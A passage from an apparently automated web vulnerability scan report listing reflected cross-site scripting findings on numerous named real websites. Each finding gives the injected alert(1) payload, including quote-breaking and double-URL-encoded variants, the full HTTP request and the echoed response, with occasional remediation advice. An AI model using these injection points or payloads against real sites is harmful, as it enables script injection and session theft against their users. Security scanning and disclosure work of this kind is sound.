Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:51 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=349be7e19eac4cbc0b7aef57a8834603; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19261

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <HTML>
   <head>
   <meta name="robots" content="noindex,follow">
   <ti
...[SNIP]...
<a href="javascript:bookmarksite('http://www.osbornewood.com', 'http://www.osbornewood.com/favicon.icoc2a3a"><script>alert(1)</script>8f0a1a4c44b')">
...[SNIP]...

6.87. http://www.outsideinfo.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsideinfo.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97c1b<script>alert(1)</script>7564d18a5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?97c1b<script>alert(1)</script>7564d18a5db=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsideinfo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:45:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 315
Content-Type: text/html
Set-Cookie: hotvisitor=resp%5Fid=0&visitor%5Fid=%7B181737FE%2DE1B4%2D408E%2DA42A%2DCFF09AE4D61A%7D; expires=Wed, 01-Jan-2025 05:00:00 GMT; path=/
Set-Cookie: hotsession=cover%5Fimage%5Ftag=&issue%5Fdate=2011%2D05%2D01&pretty%5Fissue%5Fdate=May+2011&issue%5Fid=37768&survey%5Fset%5Fid=0&preview%5Fmode=False&eresponse=False&card%5Fsurvey%5Fset%5Fid=0&resp%5Fauthenticated=False&session%5Fid=%7B1301BBA9%2D579C%2D404E%2D8D21%2D0D2E02504486%7D; path=/
Set-Cookie: ASPSESSIONIDCSTDBDDB=FJGJHNNDGPODKCFEDJMOOGBI; path=/
Cache-control: private


   <html>
   <head>
   <title>404 Not Found</title>
   </head>
   <body bgcolor="White">
   <h1>404 Not Found</h1>
   <p> http://www.outsideinfo.com/favicon.ico?97c1b<script>alert(1)</script>7564d18a5db=1    </p>
...[SNIP]...

6.88. http://www.pordeo.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pordeo.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94c4b%253cscript%253ealert%25281%2529%253c%252fscript%253e94ee537d775 was submitted in the REST URL parameter 1. This input was echoed as 94c4b<script>alert(1)</script>94ee537d775 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /94c4b%253cscript%253ealert%25281%2529%253c%252fscript%253e94ee537d775 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pordeo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TR=pordeo; expires=Tue, 03-May-2011 10:55:45 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 22405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   Po
...[SNIP]...
<b>94c4b<script>alert(1)</script>94ee537d775 </b>
...[SNIP]...

6.89. http://www.prosolutionpills.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prosolutionpills.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f3e6"-alert(1)-"58a8dd981ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico2f3e6"-alert(1)-"58a8dd981ee HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:20:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:20:10 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=0eea6ba9b5f95ddcb0241f0eac2a7a6d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:20:10 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:20:10 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29340

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!--
s.pageName="www.prosolutionpills.com/favicon.ico2f3e6"-alert(1)-"58a8dd981ee"
s.server="www.prosolutionpills.com"
s.channel="World Niche"
s.prop7="www.prosolutionpills.com"
s.eVar1="N/A"
s.events=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_c
...[SNIP]...

6.90. http://www.prosolutionpills.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prosolutionpills.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df43"-alert(1)-"d4e4a0237a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?2df43"-alert(1)-"d4e4a0237a1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:19:59 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=dc467bb71902097ca9e3122fc19927cd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:19:59 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:19:59 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29343

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!--
s.pageName="www.prosolutionpills.com/favicon.ico?2df43"-alert(1)-"d4e4a0237a1=1"
s.server="www.prosolutionpills.com"
s.channel="World Niche"
s.prop7="www.prosolutionpills.com"
s.eVar1="N/A"
s.events=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s
...[SNIP]...

6.91. http://www.pusd.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pusd.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e662d<script>alert(1)</script>981d22cc7ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe662d<script>alert(1)</script>981d22cc7ba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pusd.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:23:05 GMT
Server: Apache
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 2797
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fe34b5953bf3ee77a7679654bb1fd7f0; path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.icoe662d<script>alert(1)</script>981d22cc7ba</div>
...[SNIP]...

6.92. http://www.reflector.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reflector.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fddf"><script>alert(1)</script>126035c3afe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6fddf"><script>alert(1)</script>126035c3afe HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reflector.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:23:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS391af22a12335d38985f8e98d0435ca9=7863e333ea324158c8ecea1d13214430; expires=Thu, 26-May-2011 13:54:03 GMT; path=/; domain=.reflector.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:20:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 20783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<A href="/user/login?destination=favicon.ico6fddf"><script>alert(1)</script>126035c3afe">
...[SNIP]...

6.93. http://www.schneider.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.schneider.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5aad6<a%20b%3dc>16184a332c3 was submitted in the REST URL parameter 1. This input was echoed as 5aad6<a b=c>16184a332c3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico5aad6<a%20b%3dc>16184a332c3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schneider.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:22 GMT
Server: Apache/2.0.52 (Oracle)
Content-type: text/html; charset=UTF-8
Content-Length: 12617
Connection: close
Set-Cookie: BIGipServerpool_http_www=1396367009.30750.0000; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><meta http-equiv="Content
...[SNIP]...
<br/>
Error Message: Failed to locate document information for document with content ID 'favicon.ico5aad6<a b=c>16184a332c3'. The document is no longer in the system.<br/>
...[SNIP]...

6.94. http://www.sport-tube.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sport-tube.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2df6<script>alert(1)</script>d52a692c673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof2df6<script>alert(1)</script>d52a692c673 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sport-tube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:47:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=916ce51099189b5098887df1bc172d87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 317

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icof2df6<script>alert(1)</script>d52a692c673 was not found on this server.<P>
...[SNIP]...

6.95. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state-insurance-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a55'-alert(1)-'046e1e52bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico26a55'-alert(1)-'046e1e52bb8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.state-insurance-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=9eacc0d802f93d6461e0437462db0d2b; path=/; domain=.state-insurance-online.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<title>Get
...[SNIP]...
<![CDATA[ */
   try {
       var pageTracker = _gat._getTracker("UA-10767246-47");
       pageTracker._setDomainName('.state-insurance-online.com');
       pageTracker._trackPageview('/favicon.ico26a55'-alert(1)-'046e1e52bb8');
   }
   catch(err) {}
/* ]]>
...[SNIP]...

6.96. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state-insurance-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e4ea"><script>alert(1)</script>8c6310db10a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4e4ea"><script>alert(1)</script>8c6310db10a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.state-insurance-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=2a8d68cc828e341da9ecf51dc0fcde45; path=/; domain=.state-insurance-online.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<title>Get
...[SNIP]...
<link rel="canonical" href="http://www.state-insurance-online.com/favicon.ico4e4ea"><script>alert(1)</script>8c6310db10a" />
...[SNIP]...

6.97. http://www.straight.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.straight.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4497b"><script>alert(1)</script>962dbdb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4497b"><script>alert(1)</script>962dbdb4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417872"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<meta property="og:url" content="http://www.straight.com/favicon.ico4497b"><script>alert(1)</script>962dbdb4d" />
...[SNIP]...

6.98. http://www.thedailycat.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailycat.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61c4e'-alert(1)-'a729dccf86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /61c4e'-alert(1)-'a729dccf86e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailycat.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 24326
Date: Tue, 03 May 2011 11:17:31 GMT
X-Varnish: 862715183
Age: 0
Via: 1.1 varnish
Connection: keep-alive


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   
...[SNIP]...
<a href="http://www.thedailycat.com/61c4e'-alert(1)-'a729dccf86e/programsend/programsend.html" target="_blank">
...[SNIP]...

6.99. http://www.thomann.de/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thomann.de
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff79c"><a>32dbe0704d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoff79c"><a>32dbe0704d3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomann.de
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:36:06 GMT
Server: Apache/2.2.17
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>

<meta name="copyright" CONTENT="(c) 1996-2008 Musikhaus Thomann. Alle Rechte vorbehalten.">
<meta name="description" conte
...[SNIP]...
<input type="hidden" name="url" value="/favicon.icoff79c"><a>32dbe0704d3">
...[SNIP]...

6.100. http://www.tradearca.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradearca.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload afcaf<script>alert(1)</script>578bc22bc55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoafcaf<script>alert(1)</script>578bc22bc55 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:33:30 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40784
Content-Type: text/html
Expires: Mon, 02 May 2011 11:32:30 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=GEIHKEODIGCLFNFCNJINCHHK; path=/
Cache-control: False


<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<font color="red">http://www.tradearca.com/favicon.icoafcaf<script>alert(1)</script>578bc22bc55</font>
...[SNIP]...

6.101. http://www.tradearca.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradearca.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ace45<script>alert(1)</script>83d451f698a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

